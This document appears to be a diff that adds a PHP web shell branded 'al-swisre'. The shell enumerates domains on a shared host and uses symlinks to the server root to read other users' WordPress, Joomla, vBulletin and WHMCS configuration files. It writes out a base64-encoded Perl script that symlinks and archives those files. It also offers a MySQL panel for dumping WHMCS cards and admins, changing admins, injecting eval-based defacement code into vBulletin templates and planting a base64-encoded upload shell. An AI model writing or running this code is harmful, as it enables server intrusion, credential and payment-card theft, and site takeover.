+[ <a href="?sws=sm"> Symlink File </a>]
+
+[<a href="?sws=sm&sy=sym"> User & Domains & Symlink </a>]
+
+[<a href="?sws=sm&sy=sec"> Domains & Script </a>]
+
+[ <a href="?sws=sm&sy=pl">Make Symlink Perl</a>]
+</div><br /><br />'  ;
+
+////////////////////////////////// file ////////////////////////
+$sws = 'al-swisre' ;
+
+if(isset($_REQUEST['sy']))
+{
+
+switch ($_REQUEST['sy'])
+{
+
+
+
+
+
+/// Domains + Scripts  ///
+
+case 'sec':
+
+
+$d00m = @file("/etc/named.conf");
+
+if(!$d00m)
+{
+die (" can't read /etc/named.conf");
+}
+else
+
+{
+echo "<div class='tmp'>
+<table align='center' width='40%'><td> Domains </td><td> Script </td>";
+foreach($d00m as $dom){
+
+if(eregi("zone",$dom)){
+
+preg_match_all('#zone "(.*)"#', $dom, $domsws);
+
+flush();
+
+if(strlen(trim($domsws[1][0])) > 2){
+
+$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
+
+///////////////////////////////////////////////////////////////////////////////////
+
+$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
+$wpp=@get_headers($wpl);
+$wp=$wpp[0];
+
+$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
+$wpp2=@get_headers($wp2);
+$wp12=$wpp2[0];
+
+///////////////////////////////
+
+$jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
+$joo=@get_headers($jo1);
+$jo=$joo[0];
+
+
+$jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
+$joo2=@get_headers($jo2);
+$jo12=$joo2[0];
+
+////////////////////////////////
+
+$vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
+$vbb=@get_headers($vb1);
+$vb=$vbb[0];
+
+$vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
+$vbb2=@get_headers($vb2);
+$vb12=$vbb2[0];
+
+$vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
+$vbb3=@get_headers($vb3);
+$vb13=$vbb3[0];
+
+/////////////////
+
+$wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
+$whh2=@get_headers($wh1);
+$wh=$whh2[0];
+
+$wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
+$whh2=@get_headers($wh2);
+$wh12=$whh2[0];
+
+$wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
+$whh3=@get_headers($wh3);
+$wh13=$whh3[0];
+
+$wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
+$whh5=@get_headers($wh5);
+$wh15=$whh5[0];
+
+$wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
+$whh4=@get_headers($wh4);
+$wh14=$whh4[0];
+
+
+
+////////////////////////////////////////////////////////////////////////////////
+
+ ////////// Wordpress ////////////
+
+$pos = strpos($wp, "200");
+$config="&nbsp;";
+
+if (strpos($wp, "200") == true )
+{
+ $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
+}
+elseif (strpos($wp12, "200") == true)
+{
+  $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
+}
+
+///////////WHMCS////////
+
+elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
+{
+  $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
+
+}
+elseif (strpos($wh12, "200")  == true)
+{
+  $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
+}
+
+elseif (strpos($wh13, "200")  == true)
+{
+  $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
+
+}
+
+///////// Joomla to 4 ///////////
+
+elseif (strpos($jo, "200")  == true)
+{
+  $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
+}
+
+elseif (strpos($jo12, "200")  == true)
+{
+  $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
+}
+
+//////////vBulletin to 4 ///////////
+
+elseif (strpos($vb, "200")  == true)
+{
+  $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
+}
+
+elseif (strpos($vb12, "200")  == true)
+{
+  $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
+}
+
+elseif (strpos($vb13, "200")  == true)
+{
+  $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
+}
+
+else
+{
+ continue;
+}
+
+/////////////////////////////////////////////////////////////////////////////////////
+
+
+
+$site = $user['name'] ;
+
+
+
+
+echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
+<td>".$config."</td></tr>"; flush();
+exit;
+
+}
+}
+}
+}
+
+
+
+
+break;
+
+
+/// user + domine + symlink  ///
+
+case 'sym':
+
+$d00m = @file("/etc/named.conf");
+
+if(!$d00m)
+{
+die (" can't read /etc/named.conf");
+}
+else
+
+{
+echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
+foreach($d00m as $dom){
+
+if(eregi("zone",$dom)){
+
+preg_match_all('#zone "(.*)"#', $dom, $domsws);
+
+flush();
+
+if(strlen(trim($domsws[1][0])) > 2){
+
+$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
+
+
+
+$site = $user['name'] ;
+
+
+@symlink("/","sym/root");
+
+$site = $domsws[1][0];
+
+$ir = 'ir';
+
+$il = 'il';
+
+if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
+{
+$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
+}
+
+
+echo "
+<tr>
+
+<td>
+<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
+</td>
+
+
+<td>
+".$user['name']."
+</td>
+
+
+
+
+
+
+<td>
+<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
+</td>
+
+
+</tr></div> ";
+
+
+flush();
+
+}
+}
+}
+}
+
+
+
+
+break;
+
+case 'pl':
+
+if (!is_dir('sa2')){
+
+$mk = @mkdir('sa2',0777);
+
+
+
+if (is_file('sa2/perl.pl'))
+{
+
+
+echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
+
+
+@chmod('sa2/perl.pl',0755);
+
+
+
+
+}
+else
+{
+
+
+
+
+$f2 =@fopen ('sa2/perl.pl','w');
+
+
+$sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+W35dIFBhaW4gU3ltbGluazwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nfn52QnVsbGV0aW4yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLid+fnZCdWxsZXRpbjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nfn5QaHBiYjEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+UGhwYmIyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLid+fldvcmRwcmVzczEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nfn5Xb3JkcHJlc3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGExLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fkpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG0yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG00LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vcmRlci9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJ35+NS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nfn40LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJ35+aW52aXNpby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJ35+Ny50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0LnBocCcsJGtvbGEuJ35+OC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJ35+bWstcG9ydGFsZTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywka29sYS4nfn4xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLid+flNtZi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nfn5waHBiYjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLid+fmluZmluaXR5LnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQogPGJyIC8+PGJyIC8+DQo8Zm9ybSBtZXRob2Q9InBvc3QiPg0KPHRleHRhcmVhIG5hbWU9InBhc3MiIHN0eWxlPSJib3JkZXI6MnB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogNTQzcHg7IGhlaWdodDogNDIwcHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGIiAgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDs8cD4NCjxpbnB1dCBuYW1lPSJ0YXIiIHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGOyAiICAvPjxiciAvPg0KJm5ic3A7PC9wPg0KPHA+DQo8aW5wdXQgbmFtZT0iU3VibWl0MSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR2V0IENvbmZpZyIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMDMzMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6I0ZGRkZGRjsgdGV4dC10cmFuc2Zvcm06dXBwZXJjYXNlOyBoZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz48L3A+DQo8L2Zvcm0+PGJyIC8+PGJyIC8+UmlnaHRzIG9mIHRoaXMgcGVybCB0byBLYXJhciBhTFNoYU1pJzsNCn1lbHNlew0KQGxpbmVzID08JEZPUk17cGFzc30+Ow0KJHkgPSBAbGluZXM7DQpvcGVuIChNWUZJTEUsICI+dGFyLnRtcCIpOw0KcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1JNe3Rhcn0uIi50YXIgIjsNCmZvciAoJGthPTA7JGthPCR5OyRrYSsrKXsNCndoaWxlKEBsaW5lc1ska2FdICA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KIH0NCnByaW50Jzxib2R5IGNsYXNzPSJuZXdTdHlsZTEiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+RG9uZSAhITwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5DbGljayBIZXJlIFRvIERvd25sb2FkIFRhciBGaWxlPC9zcGFuPjwvZm9udD48L2E+PC9wPic7DQp9DQp9DQogcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+Ijs=";
+
+$write = fwrite ($f2 ,base64_decode($sml_perl));
+
+if ($write)
+{
+
+@chmod('sa2/perl.pl',0755);
+
+
+}
+
+echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
+}
+
+
+break;
+
+
+}
+/// home ///
+}
+}
+else
+{
+
+echo '
+The file path to symlink
+
+<br /><br />
+<form method="post">
+<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
+<input type="text" name="symfile" value="sa.txt" size="60"/><br /><br />
+<input type="submit" value="symlink" name="symlink" /> <br /><br />
+
+
+
+</form>
+';
+
+
+$pfile = $_POST['file'];
+$symfile = $_POST['symfile'];
+$symlink = $_POST['symlink'];
+
+if ($symlink)
+{
+
+@symlink("$pfile","sym/$symfile");
+
+echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
+exit;
+}else {exit;}
+
+
+
+
+}
+
+
+
+break;
+
+
+
+//////////////////////// mysql ///////////////////////////////////////////////////////////////////////////////
+
+
+case 'ms':
+
+
+
+
+$host = $_POST['host'];
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$db = $_POST['db'];
+
+
+
+
+
+
+////////////////// HEEEEEEEEEEEEERE  /////////////////////////////////////////////// HEEEEEEEEEEEEERE  /////////////////////////////
+
+if ($_GET['show'] == 'tb'){
+
+$host_c =  $_COOKIE['host_mysql'];
+$user_c =  $_COOKIE['user_mysql'];
+$pass_c =  $_COOKIE['pass_mysql'];
+$db_c   =  $_COOKIE['db_mysql'];
+
+
+$con = @mysql_connect($host_c,$user_c,$pass_c);
+$sel = @mysql_select_db($db_c);
+
+
+if(!$sel){ echo "mysql connect error" ; exit;}
+
+$dbname = $db_c;
+
+$pTable =  mysql_list_tables( $dbname ) ;
+
+$num = mysql_num_rows( $pTable );
+
+echo "<div class='tmp'>
+<table align='center' width='40%'><td> Tables </td><td> Rows </td>";
+
+for( $i = 0; $i < $num; $i++ ) {
+
+
+    $tablename = mysql_tablename( $pTable, $i );
+
+    $sq3l=mysql_query("select  * from $tablename");
+
+    $c3t=mysql_num_rows($sq3l);
+
+    echo "
+
+    <tr>
+
+<td>
+<div class='dom'><a  href='$pg?sws=ms&show=cl&tb=$tablename'  />".$tablename." </a> </div>
+</td>
+
+
+<td>
+".$c3t."
+</td>
+
+</tr>
+
+    ";
+
+
+
+
+if ($tablename == 'template')  { $secript = 'vb'; }
+
+else if ($tablename == 'wp_post') {$secript = 'wp';}
+
+else if ($tablename == 'jos_users') {$secript = 'jm';}
+
+else if ($tablename == 'tbladmins') {$secript = 'wh';}
+
+
+}
+
+
+if ($secript == 'vb')
+
+{
+
+
+echo '<div class="cont">
+<div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options vBulletin </b>
+<br />  <br /> <b>
+[ <a href="?sws=ms&op=in"> Update Index </a>]
+
+[<a href="?sws=ms&op=sh"> Inject shell</a>]
+
+[ <a href="?sws=ms&op=shm" >Show members Information</a>]
+';
+
+
+}
+
+
+
+else if ($secript == 'wp')
+{
+
+
+  echo '
+ <div class="cont">
+ <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Wordpress </b><div>
+<br />  <br /> <b>
+[ <a href="?sws=ms&op=awp"> Change admin </a>]
+
+[ <a href="?sws=ms&op=shwp" >Show members</a>]';
+
+
+  }
+
+
+else if ($secript == 'wh'){
+
+  echo '
+ <div class="cont">
+ <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Whmcs </b><div>
+<br />  <br /> <b>
+[ <a href="?sws=ms&op=hroot">roots</a>]
+[ <a href="?sws=ms&op=chost"> Clients Hosting Account </a>]
+[ <a href="?sws=ms&op=scard" >Cards</a>] <br /><br />
+[ <a href="?sws=ms&op=trak" >tickets</a>]
+[ <a href="?sws=ms&op=rtrak" >ticket replies</a>]
+ [ <a href="?sws=ms&op=sh3"> Search ticket</a>]
+[ <a href="?sws=ms&op=cadmin"> Change admin </a>]';
+
+
+}
+else{echo '<div class="cont"> ';}
+
+
+/////////////// cmd ////////////////////////////////
+ echo "<br /><br />
+
+ [ <a href='?sws=ms&op=bkup'> baukup </a>]
+ [ <a href='?sws=ms&op=css'> Inject css </a>]
+ <br /><br />
+<form method='post'>
+<textarea rows=\"3\" name=\"sql\">Cmd sql</textarea> <br /><br />
+<input type=\"submit\" value=\"SQL\" name='cmd'/>
+</form>
+<br /><br />
+<a style=\" float: right\" href=\"?sws=ms&op=out\" >[ Logout ]</a>";
+
+if (isset($_POST['cmd']))
+{
+
+$sql  = $_POST['sql'];
+
+$query =@mysql_query($sql,$con) or die;
+
+if ($query){echo "<br /><br /><center><br /><div style=\"color: #003300;  font-weight: bold\">CMD sql successfully </div>  </center>";} elseif(!$query) {echo "<br /><br /><center><br /><div style=\"color: red;  font-weight: bold\">CMD sql error </div>  </center>";}
+
+
+}
+
+exit;
+
+
+}
+
+///////////////////// show cl ///////////////
+else if ($_GET['show'] == 'cl')
+
+{
+
+
+
+
+
+    $host_c =  $_COOKIE['host_mysql'];
+    $user_c =  $_COOKIE['user_mysql'];
+    $pass_c =  $_COOKIE['pass_mysql'];
+    $db_c   =  $_COOKIE['db_mysql'];
+
+
+    $con = @mysql_connect($host_c,$user_c,$pass_c);
+    $sel = @mysql_select_db($db_c);
+
+    $tb = $_GET['tb'];
+
+    $col_sws = mysql_query("SHOW COLUMNS FROM $tb");
+
+    $num2 = mysql_num_rows( $col_sws );
+    echo "<div class='tmp'> <table align='center'><td>Columns Name</td><td>Content</td>";
+    for( $i2 = 0; $i2 < $num2; $i2++ ){
+
+    $col = mysql_fetch_row($col_sws) ;
+    $um_sws =  $col[0];
+
+     echo "<tr><td>$um_sws&nbsp;</td>" ;
+
+
+     $tit = mysql_query ("SELECT * FROM $tb" );
+     while ($row = mysql_fetch_assoc($tit))
+     {
+
+      $cont = $row[$um_sws] ;
+
+     echo "<td>$cont</td></tr>" ;
+
+
+}
+
+;
+
+
+}
+
+
+
+
+exit;
+
+
+}
+
+
+
+
+
+
+
+
+
+if (isset($_COOKIE['host_mysql'])){
+
+if (!isset($_GET['op'])){
+
+echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
+
+
+exit;
+}
+
+
+}
+
+
+
+
+
+else if (!isset($_COOKIE['host_mysql']))
+
+{
+
+
+if (!isset($host))
+{
+
+
+echo '
+
+<div >
+
+<br /><br /><br />
+<pre><form method="POST">
+host :<input type="text" name="host" /><br />
+user :<input type="text" name="user" /><br />
+pass :<input type="text" name="pass" /><br />
+db   :<input type="text" name="db" /><br />
+<input type="submit" name="login" value="login .."   />
+</form></pre>';
+exit;}
+else
+{
+
+$host = $_POST['host'];
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$db = $_POST['db'];
+
+
+$con = @mysql_connect($host,$user,$pass) ;
+
+$sel = @mysql_select_db($db,$con);
+
+if (!$sel)
+{
+
+echo " MYSQL INFOTMATI NOT TREY ";
+
+
+}
+
+else
+{
+
+
+
+setcookie( "host_mysql", $host);
+setcookie( "user_mysql", $user);
+setcookie( "pass_mysql", $pass);
+setcookie( "db_mysql", $db);
+ob_end_flush();
+
+echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
+exit;
+
+
+
+
+
+}}}
+
+
+
+
+/////////////////////////////////// Options /////////////////////////////////////////
+
+if (isset($_GET['op']))
+{
+
+$op = $_GET['op'];
+
+    $host_c =  $_COOKIE['host_mysql'];
+    $user_c =  $_COOKIE['user_mysql'];
+    $pass_c =  $_COOKIE['pass_mysql'];
+    $db_c   =  $_COOKIE['db_mysql'];
+
+    $con3 =@mysql_connect($host_c,$user_c,$pass_c) or die ;
+    $sedb3 =@mysql_select_db($db_c,$con3) or die;
+    if (!$sedb3){echo "error in mysql connect "; exit;}
+
+
+      /////// index vb ////////
+
+if ($op == 'in')
+{
+
+if (!isset($index)){
+
+echo '
+    Your index : <br /><br />
+     <form  method="post">
+
+     <textarea rows="7" name="index" cols="40"></textarea>
+
+     <br /><br />
+     <input type="submit" value="Update Index" maxlength="30" name="sql" />
+     </form> ';
+}
+else if ($_POST['sql'])
+{
+
+
+$index =$_POST['index'];
+
+$index=str_replace("\'","'",$index);
+$crypt  = "{\${eval(base64_decode(\'";
+$crypt .= base64_encode("echo \"$index\";");
+$crypt .= "\'))}}{\${exit()}}</textarea>";
+$sqlindex = "UPDATE `template` SET `template` = '$crypt'" or die;
+$query =@ mysql_query($sqlindex);
+
+if ($query)
+{
+  echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated Index successfully </div>  </center>";
+  echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+  exit;
+}
+else if (!$query)
+{
+  echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated Index erorr </div>  </center>";
+  echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+  exit;
+
+}
+
+
+
+
+}
+
+
+
+
+
+
+
+
+
+
+}
+/////// shelllll ///////////
+else if($op == 'sh')
+
+{
+
+
+
+if (!isset($_POST['ch']))
+{
+
+
+echo '
+<br /><br /><br />
+<form method="post">
+
+<select name="ch">
+<option value="faq">Inject shell in faq </option>
+<option value="cal">Inject shell in calendar </option>
+<option value="sea">Inject shell in search </option>
+</select>
+<br /><br /><br />
+<input type="submit" name="sql" value="Inject shell"  />
+</form>
+
+
+
+';
+
+} if (isset($_POST['sql'])){
+
+$ch = $_POST['ch'];
+$shell = "DQoNCmVjaG8gJzxiPlsgYWwtc3dpc3JlIF0mbmJzcDsmbmJzcDtbIFNhdWRpIHNoZWxsIF08YnI+PGJyPjxicj48L2I+JzsgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgISEhPC9iPjxicj48YnI+JzsgfSBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWwgISEhPC9iPjxicj48YnI+JzsgfSB9IA0KPz4=" ;
